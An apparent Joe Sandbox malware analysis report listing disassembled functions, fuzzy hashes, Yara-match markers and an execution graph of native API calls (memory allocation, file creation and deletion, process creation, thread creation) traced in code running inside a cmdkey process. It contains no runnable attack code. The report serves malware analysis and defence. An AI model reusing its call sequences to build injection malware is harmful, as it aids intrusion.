                                                                • Instruction Fuzzy Hash: F841E3317097039FD728DE29C841B6AB7E5EF98710F000A2DF95ADB680DB31E4058B96
                                                                Function 0111B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0115728C
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 011572C1
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01157294
                                                                • RTL: Resource at %p, xrefs: 011572A3
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: 9a4dcc55e6b462d43865b238f94d4aad28dd1f7194c8472959f12922367580ef
                                                                • Instruction ID: e5a82a78f0b6df71ded3b4a7bf4f223c29679e8d08e5fa7578a84f63592764e2
                                                                • Opcode Fuzzy Hash: 9a4dcc55e6b462d43865b238f94d4aad28dd1f7194c8472959f12922367580ef
                                                                • Instruction Fuzzy Hash: 17410331744212ABC728CE29CC42B6AB7B5FF94754F10462DFD65EB680DB31E8128BD5
                                                                Function 01192300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: a370d51291e8b8bf0d479132aef3d422e671239b94eb7c2deaf434db33380f5a
                                                                • Instruction ID: 4a875d2562026139d69b883f7d162896232d4ee1bbed73cbe44902b85593a3e5
                                                                • Opcode Fuzzy Hash: a370d51291e8b8bf0d479132aef3d422e671239b94eb7c2deaf434db33380f5a
                                                                • Instruction Fuzzy Hash: 66316872A00219AFDF24DF2DDC41BEE77F8EB58614F444555E959D3140EB30AA548BA0
                                                                Function 01127D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction ID: 6edff4a55947dd07c507ca1f02c1e297abcda4f189ef5f39e8c7d466d288e6db
                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction Fuzzy Hash: 7891D771E042369BDB2CDF6DC891ABFBBA5EF54320F14451AE965E72C0D73089608762
                                                                Function 010E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: 58cdb5e6479e536e6969b74e1e3850060bc6f05d7ee3880eb5434fc14691d63a
                                                                • Instruction ID: b05b8ee1f58ccb7a8672c7f47d30d6338c30eff4811ba7912c051eba972032e8
                                                                • Opcode Fuzzy Hash: 58cdb5e6479e536e6969b74e1e3850060bc6f05d7ee3880eb5434fc14691d63a
                                                                • Instruction Fuzzy Hash: 02811A71D012699BDB35CB54CC45BEEBBB8AF48754F0041EAEA19B7280D7709E84CFA0

                                                                Execution Graph

                                                                Execution Coverage:2.6%
                                                                Dynamic/Decrypted Code Coverage:3.6%
                                                                Signature Coverage:1.3%
                                                                Total number of Nodes:521
                                                                Total number of Limit Nodes:82
                                                                execution_graph 97165 a107a0 97166 a107b9 97165->97166 97171 a13f00 97166->97171 97168 a107d7 97169 a10823 97168->97169 97170 a10810 PostThreadMessageW 97168->97170 97170->97169 97172 a13f24 97171->97172 97173 a13f60 LdrLoadDll 97172->97173 97174 a13f2b 97172->97174 97173->97174 97174->97168 97175 a16b20 97176 a16b39 97175->97176 97186 a16b8c 97175->97186 97176->97186 97192 a28cb0 97176->97192 97177 a16cc4 97179 a16cec 97177->97179 97187 a24dc0 97177->97187 97180 a16b54 97195 a15f00 NtClose LdrInitializeThunk LdrInitializeThunk 97180->97195 97183 a16c9e 97183->97177 97197 a160d0 NtClose LdrInitializeThunk LdrInitializeThunk 97183->97197 97186->97177 97196 a15f00 NtClose LdrInitializeThunk LdrInitializeThunk 97186->97196 97188 a24e25 97187->97188 97189 a24e5c 97188->97189 97198 a21110 97188->97198 97189->97179 97191 a24e3e 97191->97179 97193 a28ccd 97192->97193 97194 a28cde NtClose 97193->97194 97194->97180 97195->97186 97196->97183 97197->97177 97199 a210a3 97198->97199 97200 a210b4 97199->97200 97201 a210c8 97199->97201 97207 a210dc 97199->97207 97203 a28cb0 NtClose 97200->97203 97202 a28cb0 NtClose 97201->97202 97204 a210d1 97202->97204 97205 a210bd 97203->97205 97208 a2aeb0 RtlAllocateHeap 97204->97208 97205->97191 97207->97191 97208->97207 97209 3512ad0 LdrInitializeThunk 97210 a1bf60 97212 a1bf89 97210->97212 97211 a1c08c 97212->97211 97213 a1c02e FindFirstFileW 97212->97213 97213->97211 97214 a1c049 97213->97214 97215 a1c073 FindNextFileW 97214->97215 97218 a1be50 NtClose RtlAllocateHeap 97214->97218 97215->97214 97217 a1c085 FindClose 97215->97217 97217->97211 97218->97214 97219 a15560 97224 a17a90 97219->97224 97221 a15590 97223 a155bc 97221->97223 97228 a17a10 97221->97228 97225 a17aa3 97224->97225 97235 a281d0 97225->97235 97227 a17ace 97227->97221 97229 a17a54 97228->97229 97234 a17a75 97229->97234 97241 a27fb0 97229->97241 97231 a17a65 97232 a17a81 97231->97232 97233 a28cb0 NtClose 97231->97233 97232->97221 97233->97234 97234->97221 97236 a2824b 97235->97236 97238 a281f8 97235->97238 97240 3512dd0 LdrInitializeThunk 97236->97240 97237 a28270 97237->97227 97238->97227 97240->97237 97242 a28027 97241->97242 97243 a27fd5 97241->97243 97246 3514650 LdrInitializeThunk 97242->97246 97243->97231 97244 a2804c 97244->97231 97246->97244 97252 a195a3 97253 a195af 97252->97253 97254 a195b6 97253->97254 97256 a2ad90 97253->97256 97259 a29030 97256->97259 97258 a2ada9 97258->97254 97260 a2904d 97259->97260 97261 a2905e RtlFreeHeap 97260->97261 97261->97258 97267 a25360 97268 a253c5 97267->97268 97269 a25400 97268->97269 97272 a20d20 97268->97272 97271 a253e2 97273 a20cf5 97272->97273 97274 a20d3d 97273->97274 97275 a28cb0 NtClose 97273->97275 97274->97271 97276 a20d0c 97275->97276 97276->97271 97277 a181a4 97278 a24dc0 2 API calls 97277->97278 97279 a181b4 97278->97279 97280 a18164 97279->97280 97282 a16950 NtClose RtlAllocateHeap LdrInitializeThunk LdrInitializeThunk 97279->97282 97282->97280 97283 a09ab0 97285 a09cef 97283->97285 97284 a0a006 97285->97284 97287 a2a9f0 97285->97287 97288 a2aa16 97287->97288 97293 a040d0 97288->97293 97290 a2aa22 97291 a2aa5b 97290->97291 97296 a24f20 97290->97296 97291->97284 97295 a040dd 97293->97295 97300 a12bd0 97293->97300 97295->97290 97297 a24f82 97296->97297 97299 a24f8f 97297->97299 97320 a113e0 97297->97320 97299->97291 97301 a12bea 97300->97301 97303 a12c03 97301->97303 97304 a29730 97301->97304 97303->97295 97305 a2974a 97304->97305 97306 a24dc0 2 API calls 97305->97306 97308 a29770 97306->97308 97307 a29779 97307->97303 97308->97307 97313 a282d0 97308->97313 97311 a2ad90 RtlFreeHeap 97312 a297ef 97311->97312 97312->97303 97314 a282ed 97313->97314 97317 3512c0a 97314->97317 97315 a28319 97315->97311 97318 3512c1f LdrInitializeThunk 97317->97318 97319 3512c11 97317->97319 97318->97315 97319->97315 97321 a1141b 97320->97321 97342 a17820 97321->97342 97323 a11423 97340 a116f0 97323->97340 97353 a2ae70 97323->97353 97325 a11439 97326 a2ae70 RtlAllocateHeap 97325->97326 97327 a1144a 97326->97327 97328 a2ae70 RtlAllocateHeap 97327->97328 97329 a1145b 97328->97329 97356 a158f0 97329->97356 97331 a11465 97332 a24dc0 2 API calls 97331->97332 97336 a1149f 97331->97336 97333 a1148a 97332->97333 97334 a24dc0 2 API calls 97333->97334 97334->97336 97341 a114e6 97336->97341 97366 a163d0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97336->97366 97337 a13f00 LdrLoadDll 97338 a116a2 97337->97338 97362 a27860 97338->97362 97340->97299 97341->97337 97343 a1784c 97342->97343 97367 a17710 97343->97367 97346 a17891 97349 a178ad 97346->97349 97351 a28cb0 NtClose 97346->97351 97347 a17879 97348 a17884 97347->97348 97350 a28cb0 NtClose 97347->97350 97348->97323 97349->97323 97350->97348 97352 a178a3 97351->97352 97352->97323 97378 a28fe0 97353->97378 97355 a2ae8b 97355->97325 97357 a15906 97356->97357 97359 a15910 97356->97359 97357->97331 97358 a159f6 97358->97331 97359->97358 97360 a24dc0 2 API calls 97359->97360 97361 a15a7c 97360->97361 97361->97331 97363 a278c2 97362->97363 97364 a278cf 97363->97364 97381 a11700 97363->97381 97364->97340 97366->97341 97368 a17806 97367->97368 97369 a1772a 97367->97369 97368->97346 97368->97347 97373 a28370 97369->97373 97372 a28cb0 NtClose 97372->97368 97374 a2838a 97373->97374 97377 35135c0 LdrInitializeThunk 97374->97377 97375 a177fa 97375->97372 97377->97375 97379 a28ffa 97378->97379 97380 a2900b RtlAllocateHeap 97379->97380 97380->97355 97383 a11720 97381->97383 97397 a17af0 97381->97397 97390 a11c63 97383->97390 97401 a20a50 97383->97401 97386 a1192f 97409 a2c080 97386->97409 97387 a11778 97387->97390 97404 a2bf50 97387->97404 97389 a17a90 LdrInitializeThunk 97393 a11994 97389->97393 97390->97364 97391 a11944 97391->97393 97415 a10240 97391->97415 97393->97389 97393->97390 97395 a10240 LdrInitializeThunk 97393->97395 97394 a17a90 LdrInitializeThunk 97396 a11ae5 97394->97396 97395->97393 97396->97393 97396->97394 97398 a17afd 97397->97398 97399 a17b22 97398->97399 97400 a17b1b SetErrorMode 97398->97400 97399->97383 97400->97399 97403 a20a71 97401->97403 97418 a2ad00 97401->97418 97403->97387 97405 a2bf60 97404->97405 97406 a2bf66 97404->97406 97405->97386 97407 a2ae70 RtlAllocateHeap 97406->97407 97408 a2bf8c 97407->97408 97408->97386 97410 a2bff0 97409->97410 97411 a2c04d 97410->97411 97412 a2ae70 RtlAllocateHeap 97410->97412 97411->97391 97413 a2c02a 97412->97413 97414 a2ad90 RtlFreeHeap 97413->97414 97414->97411 97425 a28f40 97415->97425 97421 a28e20 97418->97421 97420 a2ad31 97420->97403 97422 a28eb2 97421->97422 97424 a28e48 97421->97424 97423 a28ec8 NtAllocateVirtualMemory 97422->97423 97423->97420 97424->97420 97426 a28f5d 97425->97426 97429 3512c70 LdrInitializeThunk 97426->97429 97427 a10262 97427->97396 97429->97427 97430 a0af70 97431 a2ad00 NtAllocateVirtualMemory 97430->97431 97432 a0c5e1 97430->97432 97431->97432 97433 a1f170 97434 a1f1d4 97433->97434 97462 a15c70 97434->97462 97436 a1f30e 97437 a1f307 97437->97436 97469 a15d80 97437->97469 97439 a1f4b3 97440 a1f38a 97440->97439 97441 a1f4c2 97440->97441 97473 a1ef50 97440->97473 97442 a28cb0 NtClose 97441->97442 97444 a1f4cc 97442->97444 97445 a1f3c6 97445->97441 97446 a1f3d1 97445->97446 97447 a2ae70 RtlAllocateHeap 97446->97447 97448 a1f3fa 97447->97448 97449 a1f403 97448->97449 97450 a1f419 97448->97450 97451 a28cb0 NtClose 97449->97451 97482 a1ee40 CoInitialize 97450->97482 97454 a1f40d 97451->97454 97453 a1f427 97485 a28760 97453->97485 97456 a1f4a2 97457 a28cb0 NtClose 97456->97457 97458 a1f4ac 97457->97458 97459 a2ad90 RtlFreeHeap 97458->97459 97459->97439 97460 a1f445 97460->97456 97461 a28760 LdrInitializeThunk 97460->97461 97461->97460 97464 a15ca3 97462->97464 97463 a15cc7 97463->97437 97464->97463 97489 a28810 97464->97489 97466 a15cea 97466->97463 97467 a28cb0 NtClose 97466->97467 97468 a15d6c 97467->97468 97468->97437 97470 a15da5 97469->97470 97494 a285e0 97470->97494 97474 a1ef6c 97473->97474 97475 a13f00 LdrLoadDll 97474->97475 97477 a1ef8a 97475->97477 97476 a1ef93 97476->97445 97477->97476 97478 a13f00 LdrLoadDll 97477->97478 97479 a1f05e 97478->97479 97480 a13f00 LdrLoadDll 97479->97480 97481 a1f0b8 97479->97481 97480->97481 97481->97445 97484 a1eea5 97482->97484 97483 a1ef3b CoUninitialize 97483->97453 97484->97483 97486 a2877d 97485->97486 97499 3512ba0 LdrInitializeThunk 97486->97499 97487 a287ad 97487->97460 97490 a2882d 97489->97490 97493 3512ca0 LdrInitializeThunk 97490->97493 97491 a28859 97491->97466 97493->97491 97495 a285fd 97494->97495 97498 3512c60 LdrInitializeThunk 97495->97498 97496 a15e19 97496->97440 97498->97496 97499->97487 97500 a252b0 97501 a25315 97500->97501 97502 a2534c 97501->97502 97505 a20ac0 97501->97505 97506 a20adf 97505->97506 97507 a2ae70 RtlAllocateHeap 97506->97507 97507->97506 97508 a289b0 97509 a28a64 97508->97509 97511 a289dc 97508->97511 97510 a28a7a NtCreateFile 97509->97510 97512 a2bfb0 97513 a2ad90 RtlFreeHeap 97512->97513 97514 a2bfc5 97513->97514 97515 a1a6fb 97516 a1a6d1 97515->97516 97521 a1a6fe 97515->97521 97536 a1a3e0 97516->97536 97518 a1a6dd 97551 a1a060 97518->97551 97520 a1a6f3 97522 a1a779 97521->97522 97523 a2ae70 RtlAllocateHeap 97521->97523 97524 a1a797 97523->97524 97525 a2ae70 RtlAllocateHeap 97524->97525 97526 a1a7a8 97525->97526 97526->97522 97527 a13f00 LdrLoadDll 97526->97527 97529 a1a7f6 97527->97529 97528 a1a931 97529->97528 97530 a13f00 LdrLoadDll 97529->97530 97531 a1a8a1 97530->97531 97531->97528 97532 a2ad90 RtlFreeHeap 97531->97532 97533 a1a915 97532->97533 97534 a2ad90 RtlFreeHeap 97533->97534 97535 a1a922 97534->97535 97537 a1a405 97536->97537 97563 a17d00 97537->97563 97540 a1a550 97540->97518 97542 a1a567 97542->97518 97544 a1a55e 97544->97542 97546 a1a655 97544->97546 97582 a22b30 97544->97582 97586 a19ab0 97544->97586 97548 a1a6ba 97546->97548 97597 a19e20 97546->97597 97549 a2ad90 RtlFreeHeap 97548->97549 97550 a1a6c1 97549->97550 97550->97518 97552 a1a076 97551->97552 97555 a1a081 97551->97555 97553 a2ae70 RtlAllocateHeap 97552->97553 97553->97555 97554 a1a0a2 97554->97520 97555->97554 97556 a17d00 GetFileAttributesW 97555->97556 97557 a1a3b2 97555->97557 97560 a22b30 2 API calls 97555->97560 97561 a19ab0 3 API calls 97555->97561 97562 a19e20 3 API calls 97555->97562 97556->97555 97558 a1a3cb 97557->97558 97559 a2ad90 RtlFreeHeap 97557->97559 97558->97520 97559->97558 97560->97555 97561->97555 97562->97555 97564 a17d1e 97563->97564 97565 a17d25 GetFileAttributesW 97564->97565 97566 a17d30 97564->97566 97565->97566 97566->97540 97567 a22ca0 97566->97567 97568 a22cae 97567->97568 97569 a22cb5 97567->97569 97568->97544 97570 a13f00 LdrLoadDll 97569->97570 97571 a22cea 97570->97571 97572 a22cf9 97571->97572 97603 a22760 LdrLoadDll 97571->97603 97574 a2ae70 RtlAllocateHeap 97572->97574 97578 a22ea4 97572->97578 97575 a22d12 97574->97575 97576 a22e9a 97575->97576 97575->97578 97579 a22d2e 97575->97579 97577 a2ad90 RtlFreeHeap 97576->97577 97576->97578 97577->97578 97578->97544 97579->97578 97580 a2ad90 RtlFreeHeap 97579->97580 97581 a22e8e 97580->97581 97581->97544 97583 a22b46 97582->97583 97585 a22c51 97582->97585 97584 a24dc0 2 API calls 97583->97584 97583->97585 97584->97583 97585->97544 97587 a19ad6 97586->97587 97588 a24dc0 2 API calls 97587->97588 97589 a19b3d 97588->97589 97604 a1d4d0 97589->97604 97591 a19b48 97593 a19cd0 97591->97593 97594 a19b66 97591->97594 97592 a19cb5 97592->97544 97593->97592 97595 a19970 RtlFreeHeap 97593->97595 97594->97592 97614 a19970 97594->97614 97595->97593 97598 a19e46 97597->97598 97599 a24dc0 2 API calls 97598->97599 97600 a19ec2 97599->97600 97601 a1d4d0 3 API calls 97600->97601 97602 a19ecd 97601->97602 97602->97546 97603->97572 97605 a24dc0 2 API calls 97604->97605 97606 a1d4f4 97605->97606 97607 a1d501 97606->97607 97608 a24dc0 2 API calls 97606->97608 97607->97591 97609 a1d518 97608->97609 97609->97607 97610 a24dc0 2 API calls 97609->97610 97611 a1d537 97610->97611 97612 a2ad90 RtlFreeHeap 97611->97612 97613 a1d544 97612->97613 97613->97591 97615 a1998d 97614->97615 97618 a1d560 97615->97618 97617 a19a93 97617->97594 97619 a1d584 97618->97619 97619->97619 97620 a1d62e 97619->97620 97621 a2ad90 RtlFreeHeap 97619->97621 97620->97617 97621->97620 97623 a16740 97624 a1676a 97623->97624 97627 a178c0 97624->97627 97626 a16791 97628 a178dd 97627->97628 97634 a283c0 97628->97634 97630 a17934 97630->97626 97631 a1792d 97631->97630 97639 a284a0 97631->97639 97633 a1795d 97633->97626 97635 a28458 97634->97635 97636 a283e8 97634->97636 97644 3512f30 LdrInitializeThunk 97635->97644 97636->97631 97637 a28491 97637->97631 97640 a284c9 97639->97640 97641 a2854b 97639->97641 97640->97633 97645 3512d10 LdrInitializeThunk 97641->97645 97642 a28590 97642->97633 97644->97637 97645->97642 97646 a28280 97647 a2829a 97646->97647 97650 3512df0 LdrInitializeThunk 97647->97650 97648 a282c2 97650->97648 97656 a25100 97657 a25162 97656->97657 97659 a2516f 97657->97659 97660 a16d80 97657->97660 97661 a16d16 97660->97661 97662 a16d8d 97660->97662 97667 a1a940 97661->97667 97664 a16d59 97665 a16d6f 97664->97665 97673 a1abf0 97664->97673 97665->97659 97668 a1a965 97667->97668 97669 a24dc0 2 API calls 97668->97669 97671 a1aae3 97669->97671 97670 a1aba9 97670->97664 97671->97670 97672 a24dc0 2 API calls 97671->97672 97672->97670 97674 a1ac16 97673->97674 97675 a1ae43 97674->97675 97700 a290c0 97674->97700 97675->97665 97677 a1ac8f 97677->97675 97678 a2c080 2 API calls 97677->97678 97679 a1acae 97678->97679 97679->97675 97680 a1ad7f 97679->97680 97681 a282d0 LdrInitializeThunk 97679->97681 97682 a154e0 LdrInitializeThunk 97680->97682 97684 a1ad9e 97680->97684 97683 a1ad0d 97681->97683 97682->97684 97683->97680 97688 a1ad16 97683->97688 97686 a1ae2b 97684->97686 97706 a27e50 97684->97706 97685 a1ad67 97687 a17a90 LdrInitializeThunk 97685->97687 97694 a17a90 LdrInitializeThunk 97686->97694 97693 a1ad75 97687->97693 97688->97675 97688->97685 97689 a1ad48 97688->97689 97703 a154e0 97688->97703 97721 a240a0 LdrInitializeThunk 97689->97721 97693->97665 97696 a1ae39 97694->97696 97695 a1ae02 97711 a27f00 97695->97711 97696->97665 97698 a1ae1c 97716 a28060 97698->97716 97701 a290da 97700->97701 97702 a290eb CreateProcessInternalW 97701->97702 97702->97677 97704 a284a0 LdrInitializeThunk 97703->97704 97705 a1551e 97704->97705 97705->97689 97707 a27ec7 97706->97707 97709 a27e75 97706->97709 97722 35139b0 LdrInitializeThunk 97707->97722 97708 a27eec 97708->97695 97709->97695 97712 a27f7a 97711->97712 97713 a27f28 97711->97713 97723 3514340 LdrInitializeThunk 97712->97723 97713->97698 97714 a27f9f 97714->97698 97717 a280da 97716->97717 97719 a28088 97716->97719 97724 3512fb0 LdrInitializeThunk 97717->97724 97718 a280ff 97718->97686 97719->97686 97721->97685 97722->97708 97723->97714 97724->97718 97725 a11d08 97726 a11ca2 97725->97726 97727 a11cb6 97725->97727 97728 a282d0 LdrInitializeThunk 97726->97728 97731 a11d2a 97727->97731 97732 a28d50 97727->97732 97728->97727 97730 a11ccb 97733 a28d78 97732->97733 97734 a28ddc 97732->97734 97733->97730 97737 3512e80 LdrInitializeThunk 97734->97737 97735 a28e0d 97735->97730 97737->97735 97738 a12148 97739 a12165 97738->97739 97740 a15c70 2 API calls 97739->97740 97741 a12170 97740->97741 97742 a20c0e 97752 a28b20 97742->97752 97744 a20c2f 97745 a20c56 97744->97745 97746 a28cb0 NtClose 97744->97746 97747 a28cb0 NtClose 97745->97747 97746->97745 97749 a20c6b 97747->97749 97748 a20ca2 97749->97748 97750 a2ad90 RtlFreeHeap 97749->97750 97751 a20c96 97750->97751 97753 a28bc1 97752->97753 97755 a28b45 97752->97755 97754 a28bd7 NtReadFile 97753->97754 97754->97744 97755->97744 97756 a09a50 97757 a09a5f 97756->97757 97758 a09a9d 97757->97758 97759 a09a8a CreateThread 97757->97759 97762 a1fa50 97763 a1fa6d 97762->97763 97764 a13f00 LdrLoadDll 97763->97764 97765 a1fa8b 97764->97765 97766 a12ad3 97767 a17710 2 API calls 97766->97767 97768 a12ae3 97767->97768 97769 a28cb0 NtClose 97768->97769 97770 a12aff 97768->97770 97769->97770 97771 a28c10 97772 a28c81 97771->97772 97773 a28c35 97771->97773 97774 a28c97 NtDeleteFile 97772->97774 97775 a21410 97776 a21429 97775->97776 97777 a24dc0 2 API calls 97776->97777 97782 a21446 97777->97782 97778 a214b9 97779 a21471 97780 a2ad90 RtlFreeHeap 97779->97780 97781 a21481 97780->97781 97782->97778 97782->97779 97783 a214b4 97782->97783 97784 a2ad90 RtlFreeHeap 97783->97784 97784->97778 97785 a25990 97786 a259ea 97785->97786 97787 a259f7 97786->97787 97789 a233a0 97786->97789 97790 a2ad00 NtAllocateVirtualMemory 97789->97790 97791 a233de 97790->97791 97792 a13f00 LdrLoadDll 97791->97792 97794 a234e0 97791->97794 97795 a23424 97792->97795 97793 a23462 Sleep 97793->97795 97794->97787 97795->97793 97795->97794 97796 a28110 97797 a28199 97796->97797 97799 a28135 97796->97799 97801 3512ee0 LdrInitializeThunk 97797->97801 97798 a281ca 97801->97798

                                                                Executed Functions

                                                                Function 00A1BF60 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 00A1C03F
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 00A1C07E
                                                                • FindClose.KERNELBASE(?), ref: 00A1C089
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: bc431d2a63caabb78dbfddd9d9927c876f50c6dcb36a2fd955d865ef531d14ac
                                                                • Instruction ID: 1670f9ca0ae0c83a750649482f09d509f3b44de7abd87f5a377acf4a7da36913
                                                                • Opcode Fuzzy Hash: bc431d2a63caabb78dbfddd9d9927c876f50c6dcb36a2fd955d865ef531d14ac
                                                                • Instruction Fuzzy Hash: 2531C571940318BBDB20DF64DD86FFF777C9F44754F144598BA08A7181E670AB848BA0
                                                                Function 00A289B0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtCreateFile.NTDLL(?,?,26EBFB72,?,?,?,?,?,?,?,?), ref: 00A28AAB
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 13c0e337700b32827a01b834ba2e2967b66e20bbdba1ee5769c8c221ee71763a
                                                                • Instruction ID: e5654bcef7618a6af07559eb9cdbae27c791d57d2dc22c2baaefa672c9ad9e9a
                                                                • Opcode Fuzzy Hash: 13c0e337700b32827a01b834ba2e2967b66e20bbdba1ee5769c8c221ee71763a
                                                                • Instruction Fuzzy Hash: B631D2B5A01248AFCB14DF98D981EEFB7B9EF8C314F108219F909A7344D730A951CBA1
                                                                Function 00A28B20 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtReadFile.NTDLL(?,?,26EBFB72,?,?,?,?,?,?), ref: 00A28C00
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 29ecb5f19b683bae8bde661f2532c04a7cdca88c6fee6ba51465d455bd3cbe61
                                                                • Instruction ID: 7fcbb36739720d7d807f5042cf72cc0a3810316fec1716899e40a4213b97c5b9
                                                                • Opcode Fuzzy Hash: 29ecb5f19b683bae8bde661f2532c04a7cdca88c6fee6ba51465d455bd3cbe61
                                                                • Instruction Fuzzy Hash: 1231E4B5A00209AFCB14DF98D981EEFB7B9EF8C314F108219FD18A7244D770A951CBA1
                                                                Function 00A28E20 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(00A11778,?,26EBFB72,00000000,00000004,00003000,?,?,?,?,?,00A278CF,00A11778), ref: 00A28EE5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: c0be6d49259cef0ae14d695c5611987a57cc58a526c511dfc7eab09d86702fdd
                                                                • Instruction ID: 1e95ee74566be5d3f673fe648d41bd74d269c1b7503d4f7daa94f1e1486b3216
                                                                • Opcode Fuzzy Hash: c0be6d49259cef0ae14d695c5611987a57cc58a526c511dfc7eab09d86702fdd
                                                                • Instruction Fuzzy Hash: 8F214BB5A00308ABDB10DF98DD81EEF77B9EF88310F104619FD08AB284D730A911CBA1
                                                                Function 00A28C10 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteFile
                                                                • String ID:
                                                                • API String ID: 4033686569-0
                                                                • Opcode ID: 2654fa45472fd1b8a53e97c0d51a3048c08dec6e7c24a118ac8919b340fc8f4e
                                                                • Instruction ID: f0a595dbe58bb2ae857349e34b5fa67f13eb130e585cd078100fa8dee0c04d0b
                                                                • Opcode Fuzzy Hash: 2654fa45472fd1b8a53e97c0d51a3048c08dec6e7c24a118ac8919b340fc8f4e
                                                                • Instruction Fuzzy Hash: EE1170B1A003146FD610EB68DD42FEF77ACDF85724F504619FA08AB281D7717A51C7A1
                                                                Function 00A28CB0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • NtClose.NTDLL(00A210D1,?,96AB6DDB,?,?,00A210D1,?), ref: 00A28CE7
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_a00000_cmdkey.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 9c513eafea19e212686e57a6e679e6276b6313a6f199c2cd6f68de667cf9f15e
